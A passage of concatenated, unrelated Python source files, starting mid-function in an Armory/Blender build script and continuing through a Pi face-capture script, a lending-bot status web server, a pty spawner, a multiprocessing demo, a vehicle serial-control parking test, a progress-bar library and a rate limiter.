elif target_name.startswith('android'):
project_path = os.path.join(files_path + '-build', arm.utils.safestr(wrd.arm_project_name))
print('Exported Android Studio project to ' + project_path)
elif target_name.startswith('krom'):
project_path = files_path
print('Exported Krom package to ' + project_path)
else:
project_path = files_path + '-build'
print('Exported makefiles to ' + project_path)
if arm.utils.get_arm_preferences().open_build_directory:
arm.utils.open_folder(project_path)
# Android build APK
if (arm.utils.get_project_android_build_apk()) and (len(arm.utils.get_android_sdk_root_path()) > 0):
print("\nBuilding APK")
# Check settings
path_sdk = arm.utils.get_android_sdk_root_path()
if len(path_sdk) > 0:
# Check Environment Variables - ANDROID_SDK_ROOT
if os.getenv('ANDROID_SDK_ROOT') == None:
# Set value from settings
os.environ['ANDROID_SDK_ROOT'] = path_sdk
else:
project_path = ''
# Build start
if len(project_path) > 0:
os.chdir(project_path) # set work folder
if arm.utils.get_os_is_windows():
state.proc_publish_build = run_proc(os.path.join(project_path, "gradlew.bat assembleDebug"), done_gradlew_build)
else:
cmd = shlex.split(os.path.join(project_path, "gradlew assembleDebug"))
state.proc_publish_build = run_proc(cmd, done_gradlew_build)
else:
print('\nBuilding APK Warning: ANDROID_SDK_ROOT is not specified in environment variables and "Android SDK Path" setting is not specified in preferences: \n- If you specify an environment variable ANDROID_SDK_ROOT, then you need to restart Blender;\n- If you specify the setting "Android SDK Path" in the preferences, then repeat operation "Publish"')
def done_gradlew_build():
if state.proc_publish_build == None:
return
result = state.proc_publish_build.poll()
if result == 0:
state.proc_publish_build = None
wrd = bpy.data.worlds['Arm']
path_apk = os.path.join(arm.utils.get_fp_build(), arm.utils.get_kha_target(state.target))
path_apk = os.path.join(path_apk + '-build', arm.utils.safestr(wrd.arm_project_name), "app", "build", "outputs", "apk", "debug")
print("\nBuild APK to " + path_apk)
# Open directory with APK
if arm.utils.get_android_open_build_apk_directory():
arm.utils.open_folder(path_apk)
# Running emulator
if wrd.arm_project_android_run_avd:
run_android_emulators(arm.utils.get_android_emulator_name())
state.redraw_ui = True
else:
state.proc_publish_build = None
state.redraw_ui = True
os.environ['ANDROID_SDK_ROOT'] = ''
log.error('Building the APK failed, check console')
def run_android_emulators(avd_name):
if len(avd_name.strip()) == 0:
return
print('\nRunning Emulator "'+ avd_name +'"')
path_file = arm.utils.get_android_emulator_file()
if len(path_file) > 0:
if arm.utils.get_os_is_windows():
run_proc(path_file + " -avd "+ avd_name, None)
else:
cmd = shlex.split(path_file + " -avd "+ avd_name)
run_proc(cmd, None)
else:
print('Update List Emulators Warning: File "'+ path_file +'" not found. Check that the variable ANDROID_SDK_ROOT is correct in environment variables or in "Android SDK Path" setting: \n- If you specify an environment variable ANDROID_SDK_ROOT, then you need to restart Blender;\n- If you specify the setting "Android SDK Path", then repeat operation "Publish"')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
except:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
# Restart compilation server
if arm.utils.get_compilation_server():
arm.lib.server.kill_haxe()
print('Project cleaned')
|
datasets.py
|
import cv2
import numpy as np
import os
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
import time
FPS = 40
ROTATION = 0
HFLIP = False
VFLIP = True
RESOLUTION = (640, 480)
class PiStream:
''' Pi Camera Setup '''
def __init__(self, resolution = RESOLUTION, framerate = FPS, rotation = ROTATION, hflip = HFLIP, vflip = VFLIP):
''' Class initialization '''
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.camera.hflip = hflip
self.camera.vflip = vflip
self.rawCapture = PiRGBArray(self.camera, size = resolution)
self.stream = self.camera.capture_continuous(self.rawCapture, format = "bgr", use_video_port = True)
self.frame = None
self.stopped = False
def start(self):
''' Starting thread to read frames '''
t = Thread(target = self.update)
t.daemon = True
t.start()
return self
def update(self):
''' Updating frames '''
for frame in self.stream:
self.frame = frame.array
self.rawCapture.truncate(0)
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
''' Reading most recent frame '''
return self.frame
def stop(self):
''' Stopping thread '''
self.stopped = True
def check_path(path):
dir = os.path.dirname(path)
if not os.path.exists(dir):
os.makedirs(dir)
cap = PiStream().start()
cap.camera.rotation = ROTATION
cap.camera.hflip = HFLIP
cap.camera.vflip = VFLIP
time.sleep(2)
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
face_id = 1
count = 0
check_path("dataset/")
while True:
img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.4, 5)
for (x,y,w,h) in faces:
cv2.rectangle(img, (x,y), (x+w,y+h), (255,0,0), 2)
count += 1
cv2.imwrite("dataset/User." + str(face_id) + "." + str(count) + ".jpg",gray[y:y+h,x:x+w])
cv2.imshow("Frame", img)
key = cv2.waitKey(20) & 0xFF
if key == 27 or count == 400:
break
cap.stop()
cv2.destroyAllWindows()
|
WebServer.py
|
# coding=utf-8
import threading
server = None
web_server_ip = "0.0.0.0"
web_server_port = "8000"
web_server_template = "www"
def initialize_web_server(config):
'''
Setup the web server, retrieving the configuration parameters
and starting the web server thread
'''
global web_server_ip, web_server_port, web_server_template
# Check for custom web server address
compositeWebServerAddress = config.get('BOT', 'customWebServerAddress', '0.0.0.0').split(":")
# associate web server ip address
web_server_ip = compositeWebServerAddress[0]
# check for IP:PORT legacy format
if (len(compositeWebServerAddress) > 1):
# associate web server port
web_server_port = compositeWebServerAddress[1]
else:
# Check for custom web server port
web_server_port = config.get('BOT', 'customWebServerPort', '8000')
# Check for custom web server template
web_server_template = config.get('BOT', 'customWebServerTemplate', 'www')
print('Starting WebServer at {0} on port {1} with template {2}'
.format(web_server_ip, web_server_port, web_server_template))
thread = threading.Thread(target=start_web_server)
thread.daemon = True
thread.start()
def start_web_server():
'''
Start the web server
'''
import SimpleHTTPServer
import SocketServer
import socket
try:
port = int(web_server_port)
host = web_server_ip
# Do not attempt to fix code warnings in the below class, it is perfect.
class QuietHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
# quiet server logs
def log_message(self, format, *args):
return
# serve from www folder under current working dir
def translate_path(self, path):
return SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, '/' + web_server_template + path)
global server
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.TCPServer((host, port), QuietHandler)
if host == "0.0.0.0":
# Get all addresses that we could listen on the port specified
addresses = [i[4][0] for i in socket.getaddrinfo(socket.gethostname().split('.')[0], port)]
addresses = [i for i in addresses if ':' not in i] # Filter out all IPv6 addresses
addresses.append('127.0.0.1') # getaddrinfo doesn't always get localhost
hosts = list(set(addresses)) # Make list unique
else:
hosts = [host]
serving_msg = "http://{0}:{1}/lendingbot.html".format(hosts[0], port)
for host in hosts[1:]:
serving_msg += ", http://{0}:{1}/lendingbot.html".format(host, port)
print('Started WebServer, lendingbot status available at {0}'.format(serving_msg))
server.serve_forever()
except Exception as ex:
print('Failed to start WebServer: {0}'.format(ex))
def stop_web_server():
'''
Stop the web server
'''
try:
print("Stopping WebServer")
threading.Thread(target=server.shutdown).start()
except Exception as ex:
print("Failed to stop WebServer: {0}".format(ex))
|
cppty.py
|
"""Cross-platform version of pty"""
import platform
from threading import Thread
if platform.system().lower().startswith('win'):
# windows
from winpty import PtyProcess
import os
import sys
import re
import msvcrt
# TODO: CTRL+C
def spawn(argv, win_repeat_argv0=False, **kwargs):
# TODO: For whatever reason, Docker needs its name as padding in the arguments again.
if win_repeat_argv0:
argv = [argv[0]] + argv
term_size = os.get_terminal_size()
process = PtyProcess.spawn(argv, dimensions=(term_size[1], term_size[0]-2))
# TODO: Is this even thread-safe?
# TODO: "pressing up" (...in bash doesn't do what it's supposed to)
def read():
try:
while True:
if msvcrt.kbhit():
process.write(msvcrt.getwch())
except EOFError:
pass
## WRITE
t = Thread(target=read)
t.daemon = True # thread dies with the program
t.start()
## READ
try:
while True:
# Remove some unprintable escape sequences when using winpty
# TODO: FAR from perfect yet (what if sequence is on "boundary"?).
# Source: https://stackoverflow.com/a/14693789
ansi_escape = re.compile(r'\x1B\[\?25[hl]*[ -/]*[@-~]')
# TODO: Little bit of a buffering issue here.
sys.stdout.write(ansi_escape.sub('', process.read(4096)))
except EOFError:
pass
process.close()
return process.exitstatus()
else:
# linux and mac
import riptide.lib.cross_platform.stdlib_pty_fork as pty
def spawn(argv, **kwargs):
return pty.spawn(argv)
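# A minimal usage sketch; 'bash' and 'cmd.exe' are example commands chosen for the demo,
# callers normally supply their own argv (e.g. a docker CLI invocation).
if __name__ == '__main__':
    demo_cmd = ['cmd.exe'] if platform.system().lower().startswith('win') else ['bash']
    status = spawn(demo_cmd)
    print('child exited with status', status)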
|
multiprocessing_demo.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author zengxiaohui
# Datetime: 7/30/2021 10:40 AM
# @File: multiprocessing_demo
import multiprocessing
import time
from multiprocessing.managers import BaseManager
class CA(object):
def __init__(self):
self.name ="A"
self.valuey = "a_value"
def run(self):
self.valuey = "2_value"
def prints(self):
return self.valuey
def func1(sleep,sharearg,shareca,q):
time.sleep(sleep)
ct = time.time()
print("func1结束{}.{}".format(time.strftime("%Y-%m-%d,%H:%M:%S", time.localtime(ct)), (ct - int(ct)) * 1000))
# sharearg = multiprocessing.Manager().Value("s","sharearg")
# sharearg.value
sharearg.value = sharearg.value + "func1"
shareca.value.run()
q.put([{"name": "func1","sharearg":sharearg.value,"shareca":shareca.value.prints()}])
def func2(sleep,sharearg,shareca,q):
time.sleep(sleep)
ct = time.time()
print("func2结束{}.{}".format(time.strftime("%Y-%m-%d,%H:%M:%S", time.localtime(ct)), (ct - int(ct)) * 1000))
sharearg.value = sharearg.value + "func2"
q.put([{"name": "func2","sharearg":sharearg.value}])
def func3(sleep,sharearg,shareca):
time.sleep(sleep)
ct = time.time()
print("func3结束{}.{}".format(time.strftime("%Y-%m-%d,%H:%M:%S", time.localtime(ct)), (ct - int(ct)) * 1000))
sharearg.value = sharearg.value + "func3"
return [{"name": "func3","sharearg":sharearg.value}]
if __name__ == '__main__':
start = time.time()
results = []
q = multiprocessing.Queue() # queue for collecting the return results
manager = multiprocessing.Manager()
sharearg = manager.Value("s","sharearg")
ca = CA()
shareca = manager.Value(CA, ca) # shares the class instance, but value changes are not propagated back
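# manager.Value hands out a fresh copy of the stored CA instance on every .value access,
# so shareca.value.run() mutates only that temporary copy (the change is lost), whereas
# assigning sharearg.value = ... in the workers does propagate; results are therefore
# reported back through the queue q.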
shareca.value.run()
print(shareca.value.valuey)
ct = time.time()
print("开始{}.{}".format(time.strftime("%Y-%m-%d,%H:%M:%S", time.localtime(ct)), (ct - int(ct)) * 1000))
thread_func1 = multiprocessing.Process(target=func1, args=(0.4,sharearg,shareca, q))
thread_func2 = multiprocessing.Process(target=func2, args=(0.2,sharearg,shareca, q))
# start the worker processes
thread_func1.start()
thread_func2.start()
results.extend(func3(0.9,sharearg,shareca))
thread_func1.join()
thread_func2.join()
results.extend(q.get())
results.extend(q.get())
print('Main thread has ended!',time.time()-start,results)
|
parking_test.py
|
import serial
import time
import math
import threading # for testing; the goal is to use multiprocessing in the main code.
# CONSTANTS for _read(), related with encoder
DISTANCE_PER_ROTATION = 54.02 * math.pi # Distance per Rotation [cm]
PULSE_PER_ROTATION = 100. # Pulse per Rotation
DISTANCE_PER_PULSE = DISTANCE_PER_ROTATION / PULSE_PER_ROTATION # Distance per Pulse
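# assuming 54.02 cm is the wheel diameter: one rotation covers ~169.7 cm, i.e. ~1.7 cm of travel per encoder pulse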
class PlatformSerial:
def __init__(self, platform_port):
self.platform = platform_port # e.g. /dev/ttyUSB0 on GNU/Linux or COM3 on Windows.
# open the port at 115200 baud; make sure the serial port is configured accordingly in the OS
try:
self.ser = serial.Serial(self.platform, 115200) # Baud rate such as 9600 or 115200 etc.
except Exception as e:
print(e)
self.reading_data = bytearray([0 for i in range(14)])
# write data set
self.writing_data = bytearray.fromhex("5354580000000000000001000D0A")
self.speed_for_write = 0
self.steer_for_write = 0
self.brake_for_write = 0
self.gear_for_write = 0 # 0: forward, 1: reverse, 2: neutral
self.check = 0
self.present_time = 0
self.past_time = 0
self.parking_time1 = 0
self.parking_time2 = 0
self.ct1 = 0
self.ct2 = 0
self.ct3 = 0
self.ct4 = 0
self.ct5 = 0
self.ct6 = 0
self.ct7 = 0
self.ct8 = 0
self.psit = 1
self.ENC1 = 0
self.steer_platform = 0
self.speed_platform = 0
self.e1 = 0
self.e2 = 0
self.f = open("record_test_3.txt", 'w')
def _read(self): # read data from platform
reading_data = bytearray(self.ser.readline()) # read as a byte array
self.reading_data = reading_data
try:
# data parsing; see the handbook for the packet description
ETX1 = reading_data[17]
AorM = reading_data[3]
ESTOP = reading_data[4]
GEAR = reading_data[5]
SPEED = reading_data[6] + reading_data[7] * 256
STEER = reading_data[8] + reading_data[9] * 256
# adjust the STEER range
if STEER >= 32768: # 65536 / 2 = 32768
STEER = 65536 - STEER
else:
STEER = -STEER
BRAKE = reading_data[10]
time_encoder = time.time()
# ENC0, ENC_with_time, ENC2, ENC3
ENC = reading_data[11] + reading_data[12] * 256 + reading_data[13] * 65536 + reading_data[14] * 16777216
if ENC >= 2147483648:
ENC = ENC - 4294967296
ALIVE = reading_data[15] # check the platform communication period
try:
speed_from_encoder = (ENC - self.ENC1[0]) * DISTANCE_PER_PULSE / (
time_encoder - self.ENC1[1]) * 0.036
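# the 0.036 factor converts cm/s to km/h (1 cm/s = 0.036 km/h)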
except Exception as e:
print(e)
pass
self.ENC1 = (ENC, time_encoder)
self.speed_platform = SPEED
self.steer_platform = STEER
except:
pass
def _write(self, speed_for_write=None, steer_for_write=None, brake_for_write=None, gear_for_write=None):
# write data to platform
if speed_for_write is not None:
self.speed_for_write = speed_for_write
if steer_for_write is not None:
self.steer_for_write = steer_for_write
if brake_for_write is not None:
self.brake_for_write = brake_for_write
if gear_for_write is not None:
self.gear_for_write = gear_for_write
try:
self.steer_for_write = int(self.steer_for_write * 1.015)
if self.steer_for_write < 0:
self.steer_for_write = self.steer_for_write + 65536
self.writing_data[3] = 1 # AorM
self.writing_data[4] = 0 # E stop
# gear input
self.writing_data[5] = self.gear_for_write # GEAR
# speed input
self.writing_data[6] = 0
self.writing_data[7] = self.speed_for_write
# steer input, sent as two hex bytes
self.writing_data[8] = int(self.steer_for_write / 256)
self.writing_data[9] = self.steer_for_write % 256
# brake input
self.writing_data[10] = self.brake_for_write
# send back the same data that was received so the platform can track its own data reception interval
self.writing_data[11] = self.reading_data[15]
self.writing_data[12] = self.reading_data[16]
self.writing_data[13] = self.reading_data[17]
self.ser.write(bytearray(self.writing_data)) # send the serial data packet to the platform
except Exception as e:
print(e)
print(' auto error')
self.ser.write(bytearray(self.writing_data))
pass
def get_data_real_time(self):
# read platform data in real time using _read()
try:
while True:
self._read()
except KeyboardInterrupt: # exit on Ctrl+C - does not seem to work?
pass
self.ser.close()
def test_write_to_platform(self):
self.speed_for_write = 0
self.steer_for_write = 0
self.brake_for_write = 0
self.gear_for_write = 0
if self.e1 == 0:
self.e1 = self.ENC1[0]
self.e2 = self.ENC1[0]
data = "%d " % (self.e2 - self.e1)
print(data)
if self.psit == 1:
self.speed_for_write = 36
if self.ct1 == 0:
self.ct1 = self.ENC1[0]
self.ct2 = self.ENC1[0]
if (self.ct2 - self.ct1) < 100:
self.steer_for_write = 0
self.f.write("\nstraight_1 ")
self.f.write(data)
elif 100 <= (self.ct2 - self.ct1) < 290: # need to compute and compensate for the encoder overshoot during the transition (593)
self.steer_for_write = 1970
self.f.write("\nturn right ")
self.f.write(data)
if (self.ct2 - self.ct1) >= 290:
self.steer_for_write = 1970
self.speed_for_write = 0
self.brake_for_write = 60
self.f.write("\nstop ")
self.f.write(data)
if self.speed_platform == 0:
self.steer_for_write = 0
self.psit = 2
elif self.psit == 2:
if self.ct3 == 0:
self.ct3 = self.ENC1[0]
self.ct4 = self.ENC1[0]
if (self.ct4 - self.ct3) < 120:
self.speed_for_write = 36
self.steer_for_write = 0
self.brake_for_write = 0
self.f.write("\nstraight_2 ")
self.f.write(data)
if (self.ct4 - self.ct3) >= 120:
self.steer_for_write = 0
self.brake_for_write = 60
self.speed_for_write = 0
self.f.write("\nstop ")
self.f.write(data)
if self.speed_platform == 0:
self.psit = 3
self.f.write("\nstop_ENC_record ")
self.f.write(data)
elif self.psit == 3:
self.speed_for_write = 0
self.steer_for_write = 0
if self.parking_time1 == 0:
self.parking_time1 = time.time()
self.parking_time2 = time.time()
self.f.write("\ntime stop ")
if (self.parking_time2 - self.parking_time1) > 10:
self.psit = 4
elif self.psit == 4:
self.gear_for_write = 2
self.speed_for_write = 36
self.brake_for_write = 0
if self.ct5 == 0:
self.ct5 = self.ENC1[0]
self.ct6 = self.ENC1[0]
if abs(self.ct6 - self.ct5) < 120:
self.speed_for_write = 36
self.steer_for_write = 0
self.brake_for_write = 0
self.f.write("\nback_straight ")
self.f.write(data)
if abs(self.ct6 - self.ct5) >= 120:
self.steer_for_write = 0
self.brake_for_write = 60
self.speed_for_write = 0
self.f.write("\nback_stop_1 ")
self.f.write(data)
if self.speed_platform == 0:
self.psit = 5
self.f.write("\nback_stop_ENC_record ")
self.f.write(data)
elif self.psit == 5:
self.gear_for_write = 2
self.speed_for_write = 36
self.brake_for_write = 0
if self.ct7 == 0:
self.ct7 = self.ENC1[0]
self.ct8 = self.ENC1[0]
if abs(self.ct8 - self.ct7) < 190:
self.speed_for_write = 36
self.steer_for_write = 1970
self.brake_for_write = 0
self.f.write("\nback_turn_right ")
self.f.write(data)
if abs(self.ct8 - self.ct7) >= 190:
self.steer_for_write = 1970
self.brake_for_write = 60
self.speed_for_write = 0
self.f.write("\nback_stop_2 ")
self.f.write(data)
if self.speed_platform == 0:
self.steer_for_write = 0
self.psit = 6
self.f.write("\nback_stop_ENC_record_2 ")
self.f.write(data)
elif self.psit == 6:
self.gear_for_write = 0
self.speed_for_write = 36
self.steer_for_write = 0
self.brake_for_write = 0
self.f.write("\nlast_straight ")
self.f.write(data)
def test_communication_main(self):
# run one read/write/test cycle on worker threads and wait for them before the next cycle
read_thread = threading.Thread(target=self._read)
write_thread = threading.Thread(target=self._write)
test_write_thread = threading.Thread(target=self.test_write_to_platform)
read_thread.start()
write_thread.start()
test_write_thread.start()
read_thread.join()
write_thread.join()
test_write_thread.join()
if __name__ == '__main__':
port = 'COM4'
# e.g. /dev/ttyUSB0 on GNU/Linux or COM3 on Windows.
platform = PlatformSerial(port)
while True:
platform.test_communication_main()
|
progress.py
|
# coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import math
import sys
import threading
import time
import warnings
from contextlib import contextmanager
from itertools import chain, islice, repeat
from .configuration import config_handler
from .logging_hook import install_logging_hook, uninstall_logging_hook
from .timing import gen_simple_exponential_smoothing_eta, to_elapsed_text, to_eta_text
from .utils import clear_traces, hide_cursor, render_title, sanitize_text_marking_wide_chars, \
show_cursor, terminal_columns
from ..animations.utils import spinner_player
@contextmanager
def alive_bar(total=None, title=None, calibrate=None, **options):
"""An alive progress bar to keep track of lengthy operations.
It has a spinner indicator, elapsed time, throughput and ETA.
When the operation finishes, a receipt is displayed with statistics.
If the code is executed in a headless environment, ie without a
connected tty, all features are disabled but the final receipt.
Another cool feature is that it tracks the actual count in regard of the
expected count. So it will look different if you send more (or less) than
expected.
Also, the bar installs a hook in the system print function that cleans
any garbage out of the terminal, allowing you to print() effortlessly
while using the bar.
Use it like this:
>>> from alive_progress import alive_bar
... with alive_bar(123, 'Title') as bar: # <-- expected total and bar title
... for item in <iterable>:
... # process item
... bar() # makes the bar go forward
The `bar()` method should be called whenever you want the bar to go forward.
You usually call it in every iteration, but you could do it only when some
criteria match, depending on what you want to monitor.
While in a progress bar context, you have two ways to output messages:
- the usual Python `print()` statement, which will properly clean the line,
print an enriched message (including the current bar position) and
continue the bar right below it;
- the `bar.text('message')` call, which sets a situational message right within
the bar, usually to display something about the items being processed or the
phase the processing is in.
If the bar is over or underused, it will warn you!
To test all supported scenarios, you can do this:
>>> for x in 1000, 1500, 700, 0:
... with alive_bar(x) as bar:
... for i in range(1000):
... time.sleep(.005)
... bar()
Expected results are these (but you have to see them in motion!):
|████████████████████████████████████████| 1000/1000 [100%] in 6.0s (167.93/s)
|██████████████████████████▋⚠ | (!) 1000/1500 [67%] in 6.0s (167.57/s)
|████████████████████████████████████████✗ (!) 1000/700 [143%] in 6.0s (167.96/s)
|████████████████████████████████████████| 1000 in 5.8s (171.91/s)
Args:
total (Optional[int]): the total expected count
title (Optional[str]): the title, will be printed whenever there's no custom message
calibrate (int): maximum theoretical throughput to calibrate animation speed
(cannot be in the global configuration because it depends on the current mode)
**options: custom configuration options, which override the global configuration:
length (int): number of characters to render the animated progress bar
spinner (Union[str, object]): the spinner to be used in all renditions
it's a predefined name in `show_spinners()`, or a custom spinner
bar (Union[str, object]): bar to be used in definite and both manual modes
it's a predefined name in `show_bars()`, or a custom bar
unknown (Union[str, object]): bar to be used in unknown mode (whole bar is a spinner)
it's a predefined name in `show_spinners()`, or a custom spinner
theme (str): theme name in alive_progress.THEMES
force_tty (bool): runs animations even without a tty (pycharm terminal for example)
manual (bool): set to manually control percentage
enrich_print (bool): includes the bar position in print() and logging messages
title_length (int): fixed title length, or 0 for unlimited
"""
if total is not None:
if not isinstance(total, int):
raise TypeError("integer argument expected, got '{}'.".format(type(total).__name__))
if total <= 0:
total = None
config = config_handler(**options)
def run(spinner):
player = spinner_player(spinner)
while thread:
release_thread.wait()
alive_repr(next(player))
time.sleep(1. / fps())
def alive_repr(spin=''):
elapsed = time.time() - run.init
run.rate = current() / elapsed if elapsed else 0.
line = ' '.join(filter(None, (
title, bar_repr(run.percent, end), spin, monitor(), 'in',
to_elapsed_text(elapsed, end), stats(), run.text)))
line_len, cols = len(line), terminal_columns()
with print_lock:
if line_len < run.last_line_len:
clear_traces()
sys.__stdout__.write(line[:cols] + (spin and '\r' or '\n'))
sys.__stdout__.flush()
run.last_line_len = line_len
def flush_buffer():
if print_buffer:
print()
def set_text(message):
run.text = sanitize_text_marking_wide_chars(message)
if config.manual:
# FIXME update bar signatures and remove deprecated in v2.
def bar(perc=None, text=None):
"""Bar handle for manual (bounded and unbounded) modes.
Only absolute positioning.
"""
if perc is not None:
flush_buffer()
run.percent = max(0., float(perc)) # ignores negative numbers.
else:
warnings.warn(DeprecationWarning('percent will be mandatory in manual bar(),'
' please update your code.'), stacklevel=2)
update_hook()
if text is not None:
warnings.warn(DeprecationWarning("use bar.text('') instead of bar(text=''),"
' please update your code.'), stacklevel=2)
set_text(text)
return run.percent
else:
def bar(text=None, incr=1):
"""Bar handle for definite and unknown modes.
Only relative positioning.
"""
flush_buffer()
# FIXME it was accepting 0 before, so a user could be using that to change text only
run.count += max(0, int(incr)) # ignores negative numbers.
update_hook()
if text is not None:
warnings.warn(DeprecationWarning("use bar.text('') instead of bar(text=''),"
' please update your code.'), stacklevel=2)
set_text(text)
return run.count
bar.text = set_text
def print_hook(part):
if part != '\n':
# this will generate a sequence of lines interspersed with None, which will later
# be rendered as the indent filler to align additional lines under the same header.
gen = chain.from_iterable(zip(repeat(None), part.splitlines(True)))
print_buffer.extend(islice(gen, 1, None))
else:
header = header_template.format(run.count)
nested = ''.join(line or ' ' * len(header) for line in print_buffer)
with print_lock:
clear_traces()
sys.__stdout__.write('{}{}\n'.format(header, nested))
print_buffer[:] = []
print_buffer, print_lock = [], threading.Lock()
header_template = 'on {}: ' if config.enrich_print else ''
print_hook.write = print_hook
print_hook.flush = lambda: None
print_hook.isatty = sys.__stdout__.isatty
def start_monitoring(offset=0.):
hide_cursor()
sys.stdout = print_hook
run.before_handlers = install_logging_hook()
release_thread.set()
run.init = time.time() - offset
def stop_monitoring():
show_cursor()
sys.stdout = sys.__stdout__
uninstall_logging_hook(run.before_handlers) # noqa
return time.time() - run.init
thread, release_thread = None, threading.Event()
if sys.stdout.isatty() or config.force_tty:
@contextmanager
def pause_monitoring():
release_thread.clear()
offset = stop_monitoring()
alive_repr()
yield
start_monitoring(offset)
bar.pause = pause_monitoring
thread = threading.Thread(target=run, args=(config.spinner(),))
thread.daemon = True
thread.start()
if total or not config.manual: # we can count items.
logic_total, rate_spec, factor, current = total, 'f', 1.e6, lambda: run.count # noqa
else: # there's only a manual percentage.
logic_total, rate_spec, factor, current = 1., '%', 1., lambda: run.percent # noqa
if total or config.manual: # we can track progress and therefore eta.
spec = '({{:.1{}}}/s, eta: {{}})'.format(rate_spec)
gen_eta = gen_simple_exponential_smoothing_eta(.5, logic_total)
gen_eta.send(None)
stats = lambda: spec.format(run.rate, to_eta_text(gen_eta.send((current(), run.rate))))
bar_repr = config.bar(config.length)
else: # unknown progress.
bar_repr = config.unknown(config.length, config.bar)
stats = lambda: '({:.1f}/s)'.format(run.rate) # noqa
stats_end = lambda: '({:.2{}}/s)'.format(run.rate, rate_spec) # noqa
# calibration of the dynamic fps engine.
# I've started with the equation y = log10(x + m) * k + n, where:
# y is the desired fps, m and n are horizontal and vertical translation,
# k is a calibration factor, computed from some user input c (see readme for details).
# considering minfps and maxfps as given constants, I came to:
# fps = log10(x + 1) * k + minfps, which must be equal to maxfps for x = c,
# so the factor k = (maxfps - minfps) / log10(c + 1), and
# fps = log10(x + 1) * (maxfps - minfps) / log10(c + 1) + minfps
# neat! ;)
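# worked example: in count mode the default calibrate is 1e6, so adjust_log_curve is 1 and
# k = (60 - 2) / log10(1e6 + 1) ~= 9.67; a measured rate of 1000 items/s then gives
# fps ~= log10(1001) * 9.67 + 2 ~= 31 frames per second.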
min_fps, max_fps = 2., 60.
calibrate = max(0., calibrate or factor)
adjust_log_curve = 100. / min(calibrate, 100.) # adjust curve for small numbers
factor = (max_fps - min_fps) / math.log10((calibrate * adjust_log_curve) + 1.)
def fps():
if run.rate <= 0:
return 10. # bootstrap speed
if run.rate < calibrate:
return math.log10((run.rate * adjust_log_curve) + 1.) * factor + min_fps
return max_fps
end, run.text, run.last_line_len = False, '', 0
run.count, run.percent, run.rate, run.init = 0, 0., 0., 0.
if total:
if config.manual:
def update_hook():
run.count = int(math.ceil(run.percent * total))
else:
def update_hook():
run.percent = run.count / total
monitor = lambda: '{}{}/{} [{:.0%}]'.format( # noqa
'(!) ' if end and run.count != total else '', run.count, total, run.percent
)
elif config.manual:
update_hook = lambda: None # noqa
monitor = lambda: '{}{:.0%}'.format( # noqa
'(!) ' if end and run.percent != 1. else '', run.percent
)
else:
run.percent = 1.
update_hook = lambda: None # noqa
monitor = lambda: '{}'.format(run.count) # noqa
title = render_title(title, config.title_length)
start_monitoring()
try:
yield bar
finally:
flush_buffer()
stop_monitoring()
if thread:
local_copy = thread
thread = None # lets the internal thread terminate gracefully.
local_copy.join()
end, run.text, stats = True, '', stats_end
alive_repr()
|
_sync.py
|
# -*- coding: utf-8 -*-
import time
import functools
import threading
import collections
class RateLimiter(object):
"""Provides rate limiting for an operation with a configurable number of
requests for a time period.
"""
def __init__(self, max_calls, period=1.0, callback=None):
"""Initialize a RateLimiter object which enforces as much as max_calls
operations on period (eventually floating) number of seconds.
"""
if period <= 0:
raise ValueError('Rate limiting period should be > 0')
if max_calls <= 0:
raise ValueError('Rate limiting number of calls should be > 0')
# We're using a deque to store the last execution timestamps, not for
# its maxlen attribute, but to allow constant time front removal.
self.calls = collections.deque()
self.period = period
self.max_calls = max_calls
self.callback = callback
self._lock = threading.Lock()
self._alock = None
# Lock to protect creation of self._alock
self._init_lock = threading.Lock()
def __call__(self, f):
"""The __call__ function allows the RateLimiter object to be used as a
regular function decorator.
"""
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
return f(*args, **kwargs)
return wrapped
def __enter__(self):
with self._lock:
# We want to ensure that no more than max_calls were run in the allowed
# period. For this, we store the last timestamps of each call and run
# the rate verification upon each __enter__ call.
if len(self.calls) >= self.max_calls:
until = time.time() + self.period - self._timespan
if self.callback:
t = threading.Thread(target=self.callback, args=(until,))
t.daemon = True
t.start()
sleeptime = until - time.time()
if sleeptime > 0:
time.sleep(sleeptime)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
with self._lock:
# Store the last operation timestamp.
self.calls.append(time.time())
# Pop the timestamp list front (ie: the older calls) until the sum goes
# back below the period. This is our 'sliding period' window.
while self._timespan >= self.period:
self.calls.popleft()
@property
def _timespan(self):
return self.calls[-1] - self.calls[0]
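# A minimal usage sketch; the 2-calls-per-second limit and the demo function are
# illustrative only and not part of the library.
if __name__ == '__main__':
    limiter = RateLimiter(max_calls=2, period=1.0)

    @limiter
    def limited_op(i):
        # at most two of these prints can happen within any one-second window
        print('call {} at {:.2f}'.format(i, time.time()))

    for i in range(5):
        limited_op(i)

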